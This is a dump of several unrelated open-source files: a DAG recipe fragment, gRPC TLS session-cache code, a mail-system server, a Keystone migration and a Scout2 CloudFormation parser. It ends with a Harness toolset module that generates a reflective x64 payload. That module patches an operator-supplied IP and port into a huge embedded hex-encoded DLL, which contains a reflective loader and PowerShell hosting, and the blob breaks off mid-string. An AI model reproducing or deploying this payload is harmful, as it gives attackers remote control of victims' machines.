'default': ''
}
}
},
'sheet': {
'field': {
'name': 'to_sheet',
'kind': 'string',
'order': 3,
'default': ''
}
},
'tab': {
'field': {
'name': 'to_tab',
'kind': 'string',
'order': 4,
'default': ''
}
}
}
}
]
}
dag_maker = DAG_Factory('sheets_copy', RECIPE, INPUTS)
dag = dag_maker.generate()
if __name__ == "__main__":
dag_maker.print_commandline()
|
apache-2.0
|
jtattermusch/grpc
|
src/python/grpcio/grpc/experimental/session_cache.py
|
27
|
1533
|
# Copyright 2018 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""gRPC's APIs for TLS Session Resumption support"""
from grpc._cython import cygrpc as _cygrpc
def ssl_session_cache_lru(capacity):
"""Creates an SSLSessionCache with LRU replacement policy
Args:
capacity: Size of the cache
Returns:
An SSLSessionCache with LRU replacement policy that can be passed as a value for
the grpc.ssl_session_cache option to a grpc.Channel. SSL session caches are used
to store session tickets, which clients can present to resume previous TLS sessions
with a server.
"""
return SSLSessionCache(_cygrpc.SSLSessionCacheLRU(capacity))
class SSLSessionCache(object):
"""An encapsulation of a session cache used for TLS session resumption.
Instances of this class can be passed to a Channel as values for the
grpc.ssl_session_cache option
"""
def __init__(self, cache):
self._cache = cache
def __int__(self):
return int(self._cache)
|
apache-2.0
|
jstoja/TsinghuaMailSystem
|
src/com/mailsystem/__main__.py
|
1
|
1654
|
#!/usr/bin/env python
# coding: utf-8
import sys
import json
import argparse
from bottle import run
import src.com.mailsystem.api.routes as api
import src.com.mailsystem.codes as codes
from src.com.mailsystem.orm.Database import Database
from src.com.mailsystem.populate import populate_db
def read_config(setup_file):
try:
with open(setup_file) as f:
setup = json.load(f)
except Exception as e:
print(
"Can't process setup file '{}' : {}", setup_file, e
)
sys.exit(1)
return setup
def connect_dbs(setup):
databases = {}
databases['users'] = Database(
'thumailusers',
setup['users']['uri']
)
for db in setup['departments']:
infos = setup['departments'][db]
if db not in databases:
databases[db] = Database(
db,
infos['uri']
)
return databases
if __name__ == '__main__':
parser = argparse.ArgumentParser("thumail")
parser.add_argument(
'--setup', default='setup.json',
help="A JSON file with DB's configuration (defaults to setup.json)"
)
parser.add_argument(
'--populate', action='store_true', default=False,
help="Generate data to populate the databases"
)
args = parser.parse_args()
setup_file = args.setup
populate = args.populate
setup = read_config(setup_file)
dbs = connect_dbs(setup)
api.app.dbs = dbs
codes.codes = setup['codes']
codes.rev_codes = {v: k for k, v in setup['codes'].items()}
if populate:
populate_db(dbs)
run(api.app, host='0.0.0.0', port=8080)
|
mit
|
openstack/keystone
|
keystone/common/sql/expand_repo/versions/066_expand_add_role_and_project_option_tables.py
|
2
|
1880
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sql
from keystone.common import sql as ks_sql
def upgrade(migrate_engine):
meta = sql.MetaData()
meta.bind = migrate_engine
role_table = sql.Table('role', meta, autoload=True)
project_table = sql.Table('project', meta, autoload=True)
role_resource_options_table = sql.Table(
'role_option',
meta,
sql.Column('role_id', sql.String(64), sql.ForeignKey(role_table.c.id,
ondelete='CASCADE'), nullable=False, primary_key=True),
sql.Column('option_id', sql.String(4), nullable=False,
primary_key=True),
sql.Column('option_value', ks_sql.JsonBlob, nullable=True),
mysql_engine='InnoDB',
mysql_charset='utf8'
)
project_resource_options_table = sql.Table(
'project_option',
meta,
sql.Column('project_id', sql.String(64),
sql.ForeignKey(project_table.c.id, ondelete='CASCADE'),
nullable=False, primary_key=True),
sql.Column('option_id', sql.String(4), nullable=False,
primary_key=True),
sql.Column('option_value', ks_sql.JsonBlob, nullable=True),
mysql_engine='InnoDB',
mysql_charset='utf8'
)
project_resource_options_table.create()
role_resource_options_table.create()
|
apache-2.0
|
SecurityFTW/cs-suite
|
tools/Scout2/AWSScout2/services/cloudformation.py
|
3
|
1472
|
# -*- coding: utf-8 -*-
import json
from AWSScout2.configs.regions import RegionalServiceConfig, RegionConfig, api_clients
########################################
# CloudFormationRegionConfig
########################################
class CloudFormationRegionConfig(RegionConfig):
"""
CloudFormation configuration for a single AWS region
"""
def parse_stack(self, global_params, region, stack):
"""
Parse a single stack and fetch additional attributes
:param global_params: Parameters shared for all regions
:param region: Name of the AWS region
:param stack_url: URL of the AWS stack
"""
stack['id'] = stack.pop('StackId')
stack['name'] = stack.pop('StackName')
stack_policy = api_clients[region].get_stack_policy(StackName = stack['name'])
if 'StackPolicyBody' in stack_policy:
stack['policy'] = json.loads(stack_policy['StackPolicyBody'])
self.stacks[stack['name']] = stack
########################################
# CloudFormationConfig
########################################
class CloudFormationConfig(RegionalServiceConfig):
"""
CloudFormation configuration for all AWS regions
"""
region_config_class = CloudFormationRegionConfig
def __init__(self, service_metadata, thread_config = 4):
super(CloudFormationConfig, self).__init__(service_metadata, thread_config)
|
gpl-3.0
|
liorvh/Harness
|
harness/modules/payloads/x64/dll/ReflectiveHarness_x64.py
|
2
|
241621
|
'''
Harness Toolset
Copyright (c) 2015 Rich Kelley, RK5DEVMAIL[A T]gmail[D O T]com
'''
from harness.core import module
class Module(module.ModuleFrame):
about = {
'name': 'HarnessEXE_x64',
'info': 'Generate Reflective Payload (x64)',
'author': 'Rich',
'contact': '@RGKelley5',
'version': '0.1'
}
def __init__(self):
module.ModuleFrame.__init__(self, self.about)
self.add_option('IP', "0.0.0.0", "str")
self.add_option('PORT', "80", "int")
def run_module(self):
PORT = self.options.PORT
IP = self.options.IP
ip_hex = ["{:02x}".format(i) for i in map(int, IP.split("."))]
_port = format(PORT, "04x")
port_hex = [_port[i:i+2] for i in range(0, len(_port), 2)]
port_hex.reverse()
raw_code = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fd043a07b9655454b9655454b9655454ff34b454dc655454ff348b54b3655454a737c754bb655454ff34b55492655454649a9f54bc655454b9655554da655454b437b154ba655454b4378854b8655454b4378f54b8655454b4378a54b865545452696368b965545400000000000000005045000064860600abefc3550000000000000000f00022200b020c0000e2000000140100000000009024000000100000000000800100000000100000000200000600000000000000060000000000000000300200000400000000000002006001000010000000000000100000000000000000100000000000001000000000000000000000100000008075010059000000dc7501005000000000100200e001000000000200f40b00000000000000000000002002002806000010030100380000000000000000000000000000000000000000000000000000006064010070000000000000000000000000000100900200000000000000000000000000000000000000000000000000002e74657874000000eee100000010000000e2000000040000000000000000000000000000200000602e72646174610000e27d000000000100007e000000e60000000000000000000000000000400000402e64617461000000187f000000800100005c000000640100000000000000000000000000400000c02e70646174610000f40b000000000200000c000000c00100000000000000000000000000400000402e72737263000000e0010000001002000002000000cc0100000000000000000000000000400000402e72656c6f63000028060000002002000008000000ce01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000488d0dd9e10000e934170000cccccccc48895c2410574883ec20488b19488bf94885db7445f0ff4b1075384885db7433488b0b4885c9740dff15f2f1000048c70300000000488b4b084885c9740de8f911000048c7430800000000488bcbe8e911000048c70700000000488b5c24384883c4205fc3cccccccccccccccccccccc48ff25e1f10000cccccccccccccccccc488bc45541564157488da848ffffff4881eca001000048c7442430feffffff488958084889701048897818488b055e6f01004833c448898590000000488d0d954d0100ff1527ef0000803db8dc0100010f84a1050000c605abdc0100014533ff4c897c24484c897c24404c897c24384c897c24684c897c2470418d4f18e876110000488bf048894424284885c0742533c0488906488946104c897e08c7461001000000488d0d5e4d0100e8510d0000488906eb03498bf7488975904885f6750bb90e000780e8c60e0000904c897d80b918000000e81f110000488bf848894424284885c0742533c0488907488947104c897f08c7471001000000488d0d0f4d0100e8fa0c0000488907eb03498bff48897d984885ff750bb90e000780e86f0e0000904c897c24784c8d442448488d1525520100488d0dfe510100ff15b0f0000085c07912488d0dd54c0100ff151fee0000e9a10300004c897c2450488b4c2448488b01488d542450ff502885c00f88d6000000488d0dde4c0100ff15f0ed0000c74588320000004c897c2458488b4c2450488b014533c94c8d442458418d5101ff501885c00f85930000000f1f440000488d0dd14c0100ff15b3ed00004c897c2460488b4c2458488b014c8d442460488d1552510100ff1085c07838488b4c2460488b014c8d4588488d55b0ff501885c0781641b9320000004c8d45b0418bd1488d4d20e8e70e0000488b4c2460488b01ff5010488b4c2458488b01ff5010488b4c2450488b014533c94c8d442458418d5101ff501885c00f8472ffffff488b4c2450488b01ff5010488d0d504c0100ff151aed0000488b4c2448488b014c8d4c24404c8d05be500100488d5520ff501885c07912488d0d544c0100ff15eeec0000e970020000488b4c2440488b01488d558cff505085c07912488d0d7f4c0100ff15c9ec0000e94b020000837d8c007512488d0daf4c0100ff15b1ec0000e933020000488b4c2440488b014c8d4c24384c8d0540500100488d1569500100ff504885c07912488d0dc34c0100ff157dec0000e9ff010000488b4c2438488b01ff505085c07912488d0df24c0100ff155cec0000e9de010000488b4c24684885c97406488b01ff50104c897c2468488b4c2438488b01488d542468ff506885c07912488d0de74c0100ff1521ec0000e9a3010000488b5c24684885db750bb903400080e8280c0000cc488b4c24704885c97406488b01ff50104c897c2470488b034c8d442470488d15db4f0100488bcbff1085c07912488d0df34c0100ff15cdeb0000e94f01000048c745a000440000b9110000004c8d45a08d51f0ff15feed00004c8bf0488bc8ff15e2ed0000498b4e10488d157781010041b888000000900f10020f11010f104a100f1149100f1042200f1141200f104a300f1149300f1042400f1141400f104a500f1149500f1042600f114160488d89800000000f104a700f1149f0488d928000000049ffc875af498bceff155eed0000488b5c24704885db750bb903400080e8420b0000cc488b4d804885c97406488b01ff50104c897d80488b034c8d4580498bd6488bcbff906801000085c0790f488d0d584c0100ff15eaea0000eb6f488b5d804885db750bb903400080e8f50a0000cc488b4c24784885c97406488b01ff50104c897c2478488b034c8d442478488b17488bcbff908800000085c0790f488d0d504c0100ff159aea0000eb1f488b4c247848894c24284885c97406488b01ff5008488d4c2428e839010000488d0d824c0100ff156cea0000488b4c24484885c9740b488b01ff50104c897c2448488b4c24404885c9740b488b01ff50104c897c2440488b4c24384885c9740b488b01ff50104c897c2438488d0d4e4c0100ff1520ea000090488b4c24784885c97407488b01ff501090f0ff4f10752c488b0f4885c97409ff152aec00004c893f488b4f084885c97409e8350c00004c897f08488bcfe8290c000090488b4d804885c97407488b01ff501090f0ff4e10752c488b0e4885c97409ff15e8eb00004c893e488b4e084885c97409e8f30b00004c897e08488bcee8e70b000090488b4c24704885c97407488b01ff501090488b4c24684885c97406488b01ff5010488b8d900000004833cce8ca0a00004c8d9c24a0010000498b5b20498b7328498b7b30498be3415f415e5dc3cccccccccccccccccccccccccc488bc45541564157488d68a14881ecd000000048c745bffeffffff488958104889701848897820488b05326901004833c44889453f4c8bf148894db7b918000000e8820b0000488bf84889450733f64885c0743433c04889074889471048897708c7471001000000488d0dc94a0100ff153beb00004889074885c0750eb90e000780e8d9080000cc488bfe48897d074885ff750bb90e000780e8c208000090b8080000006689450f488d0d854a0100ff15fbea0000488945174885c0750bb90e000780e89808000090488d4de7ff15b5ea000090488d4d27ff15aaea000090488d0dba4a0100ff1554e80000b90c00000033d2448d41f5ff15a3ea00004c8bf88975ff4c8d450f488d55ff488bc8ff1564ea000085c07912488d0da14a0100ff151be80000e994000000488d0dc74a0100ff1509e800000f1045270f2945c7f20f104d37f20f114dd7498b0e4885c9750bb903400080e805080000cc488b01488d55e748895424304c897c2428488d55c748895424204533c941b818010000488b17ff90c80100008bd8488d0d974a0100ff15a9e7000085db790f488d0dc64a0100ff1598e70000eb14488b4defff158ce70000498bcfff15dbe9000090488d4d27ff15e0e9000090488d4de7ff15d5e9000090488d4d0fff15cae9000090f0ff4f10752c488b0f4885c97409ff157de90000488937488b4f084885c97409e88809000048897708488bcfe87c09000090498b0e4885c97406488b01ff5010488b4d3f4833cce8750800004c8d9c24d0000000498b5b28498b7330498b7b38498be3415f415e5dc3cccccccccccccccc4883ec28488d0d454a0100ff15dfe60000e86af7ffffb8010000004883c428c34883ec38ffca741c83fa05754a4d85c07445488b0547d401004989008d42fc4883c438c348890d35d40100488d0d2e4a0100ff1598e6000033c04c8d059fffffff48894424284533c933d233c989442420ff1581e60000b8010000004883c438c3cccccccccccccccccccccccccccccc488b094885c97407488b0148ff6010c3488b0424c3cccccccccccccccccccccc48894c240853415641574883ec4048896c247848897424384533ff4c896424284c896c242033f64533ed4533e44c897c2470e8b9ffffff488be8b84d5a00009066394500751a4863553c488d4ac04881f9bf0300007709813c2a50450000740548ffcdebdb65488b04256000000048897c243048896c2468488b481841bb010000004c8b71204d85f60f84d6010000bfffff0000418d5b020f1f840000000000498b5650450fb7464833c90f1f440000c1c90d0fb6023c61720a0fb6c083e8204898eb030fb6c04803c848ffc2664403c775dd81f95bbc4a6a0f85cc0000004d8b4e20bdffff00004963413c428bbc0888000000468b540f20468b5c0f244d03d14d03d90f1f40000f1f840000000000418b0a4903c94533c00fb6010f1f400041c1c80d0fbec0488d49014403c00fb60184c075eb4181f88e4e0eec74124181f8aafc0d7c74094181f854caaf917543428b440f1c410fb713498d0c014181f88e4e0eec7509448b2c914d03e9eb214181f8aafc0d7c7509448b24914d03e1eb0f4181f854caaf9175068b34914903f16603dd4983c2044983c3026685db0f856cffffff8bfde98b00000081f95d68fa3c0f85890000004d8b56204963423c428b9c1088000000468b441320468b4c13244d03c24d03ca660f1f840000000000418b104903d233c90fb6020f1f440000c1c90d0fbec0488d520103c80fb60284c075ed81f9b80a4c537518428b44131c410fb711498d0c02448b3c914d03fa664403df4983c0044983c102664585db75af4c897c247041bb01000000418d5b024d85ed740f4d85e4740a4885f674054d85ff750c4d8b364d85f60f8540feffff488b6c24684c637d3c33c941b8003000004c03fd448d4940418b57504c897c2468ffd6458b4754488bd54c8bf04d85c0741e482bc56666660f1f8400000000000fb60a488d5201884c10ff49ffc875f0450fb75706410fb747144d85d2744c4d8d4f2c4c03c866660f1f840000000000418b49f8418b11458b41fc4903ce4803d549ffca4d85c074190f1f80000000000fb60248ffc1488d52018841ff49ffc875ee4983c1284d85d275c5418baf900000004903ee8b450c85c00f849b00000049bf0000000000000080660f1f4400008bc84903ce41ffd58b5d108b7d004903de4903fe488bf048833b00745a0f1f004885ff742c488b174985d774244863463c0fb7d28b8c30880000008b4431108b4c311c4803ce482bd08b04914803c6eb10488b13488bce4883c2024903d641ffd44889034883c3084885ff74044883c70848833b0075a98b45204883c51485c00f857affffff4c8b7c24684c8b6c24204c8b642428488b7c2430488b742438488b6c24784d8bc64d2b47304183bfb4000000000f84ae000000458b9fb00000004d03de418b430485c00f849800000090418b13448bc84d8d53084983e9084903d649d1e9746e66660f1f840000000000410fb70249ffc90fb7c866c1e90c6683f90a750b25ff0f00004c010410eb3c6683f903750b25ff0f000044010410eb2b6683f901751525ff0f0000488d0c10498bc048c1e810660101eb106683f902750a25ff0f000066440104104983c2024d85c9759c418b43044c03d8418b430485c00f8569ffffff418b5f284533c033d24883c9ff4903deff5424704c8b442460ba01000000498bceffd3488bc34883c440415f415e5bc3cccccccccccccccccc48894c2408555741564883ec50488d6c243048895d4848897550488b056f6101004833c548894510488bf14885c9750733c0e92f010000ff1593e10000448d70014489750433c0894424284889442420458bce4c8bc633d233c9ff1578e100004863f8897d0085c0751aff1558e1000085c07e080fb7c00d000007808bc8e80d0100009081ff001000007d2f488bc74803c0488d480f483bc8770a48b9f0ffffffffffff0f4883e1f0488bc1e82f100000482be1488d5c2430eb0e488bcf4803c9e842080000488bd848895d08eb1133db48895d08488b7540448b75048b7d004885db750bb90e000780e8a1000000cc897c242848895c2420458bce4c8bc633d233c9ff15cfe0000085c0752a81ff001000007c08488bcbe8ab070000ff15a5e0000085c07e080fb7c00d000007808bc8e85a000000cc488bcbff15a0e20000488bf081ff001000007c08488bcbe8750700004885f6750bb90e000780e82e000000cc488bc6488b4d104833cde85e010000488b5d48488b7550488d6520415e5f5dc3cccccccccccccccccccccccccc33d248ff25ef5f0100cccccccccccccc40534883ec20488d050be30000488bd94889018b4208894108488b421048c741180000000048894110488bc84885c07406488b00ff5008488bc34883c4205bc340534883ec20488d05cbe20000488bd9488901488b49104885c97406488b01ff5010488b4b184885c9740c4883c4205b48ff25d1df00004883c4205bc3cccccc48895c2408574883ec20488d0587e20000488bd98bfa488901488b49104885c97406488b01ff5010488b4b184885c97406ff1591df000040f6c7017408488bcbe857010000488bc3488b5c24304883c4205fc3cccccccccccccccccccccccccc4883ec48488d052de20000894c24284889542430488d1515530100488d4c242048c7442438000000004889442420e87d0e0000cccccccccccccccccccccccccccccccccccccc66660f1f840000000000483b0db95e0100751148c1c11066f7c1ffff7502f3c348c1c910e989120000cc40534883ec2033db4d85c9750e4885c9750e4885d2752033c0eb2f4885c974174885d274124d85c97505668919ebe84d85c0751c668919e850150000bb160000008918e8781400008bc34883c4205bc34c8bd94c8bd24983f9ff751c4d2bd8410fb70066438904034d8d40026685c0742f49ffca75e9eb284c2bc1430fb70418664189034d8d5b026685c0740a49ffca740549ffc975e44d85c975046641891b4d85d20f856effffff4983f9ff750b66895c51fe418d4250eb90668919e8ca140000bb22000000e975ffffffe907050000cccccc40534883ec20488bd9e866150000488d05efe00000488903488bc34883c4205bc3cccccc488d05d9e00000488901e96d150000cc40534883ec40488bd9eb0f488bcbe88116000085c07413488bcbe8f10400004885c074e74883c4405bc3488d05afe00000488d542458488d4c242041b8010000004889442458e8d9140000488d057ee00000488d15b7510100488d4c24204889442420e8d00c0000cccccccc48895c2408574883ec20488d0553e000008bda488bf9488901e8e2140000f6c3017408488bcfe82dffffff488bc7488b5c24304883c4205fc3cccccc4c89442418534883ec20498bd883fa01757de88920000085c0750733c0e937010000e8bd1a000085c07507e890200000ebe9e859310000ff1513dd00004889059cdb0100e8c328000048890528b70100e87720000085c07907e8061b0000ebcbe80b24000085c0781fe8be26000085c0781633c9e8eb1c000085c0750bff05edb60100e9cc000000e86f230000ebca85d275528b05d7b6010085c00f8e7affffffffc88905c7b601003915a9bc01007505e89e1c0000e8291b00004885db7510e837230000e89a1a0000e8f11f0000904885db757f833da45d0100ff7476e8811a0000eb6f83fa02755e8b0d905d0100e8272a00004885c0755aba780400008d4801e8092f0000488bd84885c00f8408ffffff488bd08b0d645d0100e8172a0000488bcb85c0741633d2e8f1180000ff1523dc0000890348834b08ffeb16e8e5020000e9d3feffff83fa03750733c9e8e8170000b8010000004883c4205bc3cc48895c24084889742410574883ec20498bf88bda488bf183fa017505e8df2600004c8bc78bd3488bce488b5c2430488b7424384883c4205fe903000000cccccc488bc4488958204c89401889501048894808565741564883ec50498bf08bda4c8bf1ba010000008950b885db750f391d9cb50100750733c0e9d20000008d43ff83f8017738488b055cde00004885c0740a8bd3ffd08bd08944242085d274174c8bc68bd3498bcee8f4fdffff8bd08944242085c0750733c0e9920000004c8bc68bd3498bcee8d6f3ffff8bf88944242083fb01753485c075304c8bc633d2498bcee8baf3ffff4c8bc633d2498bcee8adfdffff488b05eedd00004885c0740a4c8bc633d2498bceffd085db740583fb0375374c8bc68bd3498bcee881fdfffff7d81bc923cf8bf9894c2420741c488b05b4dd00004885c074104c8bc68bd3498bceffd08bf8894424208bc7eb0233c0488b9c24880000004883c450415e5f5ec340534883ec20ba080000008d4a18e83d2d0000488bc8488bd8ff1581da0000488905ead80100488905dbd801004885db75058d4318eb064883230033c04883c4205bc3cc48895c2408488974241048897c24184154415641574883ec204c8be1e8cb1b000090488b0da3d80100ff1535da00004c8bf0488b0d8bd80100ff1525da0000488bd8493bc60f829b000000488bf8492bfe4c8d7f084983ff080f8287000000498bcee879300000488bf0493bc77355ba00100000483bc2480f42d04803d0483bd07211498bcee87d2d000033db4885c0751aeb0233db488d5620483bd67249498bcee8612d00004885c0743c48c1ff03488d1cf8488bc8ff159fd9000048890508d80100498bccff158fd90000488903488d4b08ff1582d90000488905e3d70100498bdceb0233dbe80b1b0000488bc3488b5c2440488b742448488b7c24504883c420415f415e415cc3cccc4883ec28e8ebfeffff48f7d81bc0f7d8ffc84883c428c3cc4885c97437534883ec204c8bc1488b0d34b9010033d2ff152cd9000085c07517e88f0f0000488bd8ff15d2d800008bc8e89f0f000089034883c4205bc3cccccc48895c24084889742410574883ec20488bd94883f9e0777cbf010000004885c9480f45f9488b0dddb801004885c97520e8832f0000b91e000000e8ed2f0000b9ff000000e81b170000488b0db8b801004c8bc733d2ff15b5d80000488bf04885c0752c3905f7c10100740e488bcbe81111000085c0740debabe8f60e0000c7000c000000e8eb0e0000c7000c000000488bc6eb12e8eb100000e8d60e0000c7000c00000033c0488b5c2430488b7424384883c4205fc3cccc48895c241048896c241856574154415641574883ec20418b780c4c8be1498bc8498bf14d8bf04c8bfae8da4b00004d8b14244c89168be885ff747449634610ffcf488d14bf488d1c9049035f083b6b047ee53b6b087fe0498b0f488d5424504533c0ff15f8d700004c634310448b4b0c4c03442450448b1033c94585c97417498d500c486302493bc2740bffc14883c214413bc972ed413bc9739c498b0424488d0c8949634c8810488b0c0148890e488b5c2458488b6c2460488bc64883c420415f415e415c5f5ec3cccccc488bc4488958084889681048897018488978204154415641574883ec208b7a0c488b6c2470488bda488bcb488bd5458be133f6e8044b0000448bf085ff7505e88c4b00004c8b5424684c8b4424608bd741830aff418308ff85ff742a4c8b5d084c637b10448d4aff4b8d0c89498d048b463b7438047e07463b7438087e08418bd14585c975de85d274138d42ff488d148048634310488d34904803750833d285ff74604533c948634b104903c948034d084885f6740f8b460439017e228b46083941047f1a443b217c15443b61047f0f418338ff75034189108d4201418902ffc24983c1143bd772bd418b0083f8ff7412488d0c8048634310488d048848034508eb0a418320004183220033c0488b5c2440488b6c2448488b742450488b7c24584883c420415f415e415cc348895c240848896c2410565741564883ec204c8d4c2450498bf8488beae8e6fdffff488bd5488bcf4c8bf0e8e04900008b5f0c8bf0eb27ffcbe822120000488d149b488b8028010000488d0c90486347104803c83b71047e053b71087e0685db75d533c94885c975064183c9ffeb04448b49044c8bc7488bd5498bcee80b440000488b5c2440488b6c24484883c420415e5f5ec348895c240848896c24104889742418574883ec40498bf1498be8488bda488bf9e8a711000048899838010000488b1fe898110000488b5338488b4c24784c8b4c2470c7442438010000004889903001000033db48895c2430895c242848894c2420488b0f4c8bc6488bd5e81d450000e858110000488b8c2480000000488b6c2458488b742460488998380100008d4301488b5c2450c701010000004883c4405fc3cccccc488bc44c8948204c8940184889501048894808534883ec60488bd98360d800488948e04c8940e8e8fc1000004c8b80e0000000488d5424488b0b41ffd0c744244000000000eb008b4424404883c4605bc3cccccc40534883ec20488bd9488911e8c3100000483b9820010000730ee8b5100000488b8820010000eb0233c948894b08e8a110000048899820010000488bc34883c4205bc3cc48895c2408574883ec20488bf9e87e100000483bb8200100007405e8b4480000e86b100000488b9820010000eb09483bfb7419488b5b084885db75f2e893480000488b5c24304883c4205fc3e83f100000488b4b0848898820010000ebe3cccc4883ec28e827100000488b80280100004883c428c3cccccc4883ec28e80f100000488b80300100004883c428c3cccccc40534883ec20488bd9e8f20f0000488b9020010000eb0948391a7412488b52084885d275f28d42014883c4205bc333c0ebf6cccc40534883ec20488bd9e8be0f0000488998280100004883c4205bc3cc40534883ec20488bd9e8a20f0000488998300100004883c4205bc3cc4055488dac2450fbffff4881ecb0050000488b05f45201004833c4488985a00400004c8b95f8040000488d053cd600004c8bd9488d4c24300f10000f1048100f11010f1040200f1149100f1048300f1141200f1040400f1149300f1048500f1141400f1040600f1149500f1088800000000f1141600f104070488b80900000000f1141700f11898000000048898190000000498b0b488d05cc3e00004889442450488b85e004000048895580498b124889442460486385e80400004889442468488b85f00400004c8944247048894424780fb685000500004c894c245848894588498b42404c8d4424304889442428488d45d04533c9488944242048c7459020059319ff159bd20000488b8da00400004833cce834f3ffff4881c4b00500005dc3cccccc48895c24104889742418574883ec40498bd9498bf8488bf14889542450e84e0e0000488b530848899028010000e83e0e0000488b563848899030010000e82e0e0000488b5338448b02488d5424504c8bcb4c03802801000033c0488bce894424384889442430894424284c894424204c8bc7e8b9410000488b5c2458488b7424604883c4405fc3cc488bc44889580848896810488970184889782041564883ec204d8b5138488bf24d8bf0418b1a488be9498bd148c1e304488bce498bf94903da4c8d4304e86a460000448b5b04448b5504418bc34183e302ba0100000023c24180e266440f44d84585db74134c8bcf4d8bc6488bd6488bcde8fa2500008bd0488b5c2430488b6c2438488b742440488b7c24488bc24883c420415ec3cccccccccccccccccccccccccccccccccc66660f1f8400000000004883ec104c8914244c895c24084d33db4c8d5424184c2bd04d0f42d3654c8b1c25100000004d3bd37316664181e200f04d8d9b00f0ffff41c603004d3bd375f04c8b14244c8b5c24084883c410c3cccc48895c241048897c241855488bec4883ec600f280547d400000f280d50d40000488bda488bf90f2945c00f28054fd400000f294dd00f280d54d400000f2945e00f294df04885d27416f602107411488b094883e908488b01488b5830ff5040488d5510488bcb48897de848895df0ff158cd00000488bd048894510488945f84885db741bf60308b9004099017405894de0eb0c8b45e04885d20f44c18945e0448b45d88b55c48b4dc04c8d4de0ff1555d000004c8d5c2460498b5b18498b7b20498be35dc3cccccc4883ec28488bc2488d5111488d4811e84445000085c00f94c04883c428c3cccc48895c2408574883ec20488d05afd300008bda488bf9488901e882450000f6c3017408488bcfe879f1ffff488bc7488b5c24304883c4205fc3cccccccccccccccccccccccccccccccccccccccccc66660f1f8400000000004c8bd90fb6d24983f8100f825c0100000fba2508b9010001730e57488bf98bc2498bc8f3aa5feb6d49b90101010101010101490fafd10fba25e2b80100020f829c0000004983f840721e48f7d983e10774064c2bc14989134903cb4d8bc84983e03f49c1e906753f4d8bc84983e00749c1e903741166666690904889114883c10849ffc975f44d85c0740a881148ffc149ffc875f6498bc3c30f1f80000000006666669066669048891148895108488951104883c140488951d8488951e049ffc9488951e8488951f0488951f875d8eb97666666666666660f1f84000000000066480f6ec2660f60c0f6c10f74160f1101488bc14883e00f4883c110482bc84e8d4400f04d8bc849c1e9077432eb01900f29010f2941104881c1800000000f2941a00f2941b049ffc90f2941c00f2941d00f2941e00f2941f075d54983e07f4d8bc849c1e90474140f1f8400000000000f29014883c11049ffc975f44983e00f7406410f114408f0498bc3c349b90101010101010101490fafd14c8d0d7fcdffff438b8481953200004c03c84903c8498bc341ffe1ee320000eb320000fc320000e73200001033000005330000f9320000e4320000253300001d33000014330000ef3200000c33000001330000f5320000e03200006666660f1f840000000000488951f18951f9668951fd8851ffc3488951f5ebf2488951f28951fa668951fec3488951f38951fb8851ffc3488951f48951fcc3488951f6668951fec3488951f78851ffc3488951f8c3cccce903000000cccccc488d0579500000488d0dbe450000488905ef4e0100488d050451000048890dd94e0100488905e24e0100488d053751000048890dec4e0100488905d54e0100488d05aa510000488905cf4e0100488d059c450000488905d14e0100488d05c6500000488905cb4e0100488d0518500000488905c54e0100488d05f2500000488905bf4e0100c3cccc40534883ec20488bd9ff1505cd0000b90100000089055aac0100e899510000488bcbe83d1f0000833d46ac010000750ab901000000e87e510000b9090400c04883c4205be9fb1e0000cccccc48894c24084883ec38b917000000e80bb8000085c07407b902000000cd29488d0d33a70100e86e190000488b4424384889051aa80100488d4424384883c008488905aaa70100488b0503a8010048890574a60100488b44244048890578a70100c7054ea60100090400c0c70548a6010001000000c70552a6010001000000b808000000486bc000488d0d4aa6010048c7040102000000b808000000486bc000488b0d724b010048894c0420b808000000486bc001488b0d654b010048894c0420488d0da9cf0000e8e8feffff4883c438c3cccccc488bc448895810488970184889782055488da848fbffff4881ecb0050000488b051f4b01004833c4488985a0040000418bf88bf28bd983f9ff7405e8585000008364243000488d4c243433d241b894000000e8cdfbffff488d442430488d4dd04889442420488d45d04889442428e8e1170000488b85b8040000488985c8000000488d85b8040000897424304883c008897c243448894568488b85b80400004889442440ff154acb0000488d4c24208bf8e88e1d000085c0751085ff750c83fbff74078bcbe8ce4f0000488b8da00400004833cce8abebffff4c8d9c24b0050000498b5b18498b7320498b7b28498be35dc3cccc48890d61aa0100c348895c240848896c24104889742418574883ec30488be9488b0d42aa0100418bd9498bf8488bf2ff1593ca0000448bcb4c8bc7488bd6488bcd4885c07417488b5c2440488b6c2448488b7424504883c4305f48ffe0488b4424604889442420e824000000cccccccc4883ec384883642420004533c94533c033d233c9e87fffffff4883c438c3cccc4883ec28b917000000e8b8b5000085c07407b905000000cd2941b801000000ba170400c0418d4801e84ffeffffb9170400c04883c428e9651c0000cc4883ec28e8270600004885c07509488d05fb4a0100eb044883c0144883c428c348895c2408574883ec208bf9e8ff0500004885c07509488d05d34a0100eb044883c0148938e8e6050000488d1dbb4a01004885c07404488d58108bcfe82f0000008903488b5c24304883c4205fc3cccc4883ec28e8b70500004885c07509488d05874a0100eb044883c0104883c428c34c8d150d49010033d24d8bc2448d4a08413b08742fffc24d03c14863c24883f82d72ed8d41ed83f8117706b80d000000c381c144ffffffb81600000083f90e410f46c1c34863c2418b44c204c3cccccc40534883ec204883610800488d0502cd0000c6411000488901488b12488bd9e8e4000000488bc34883c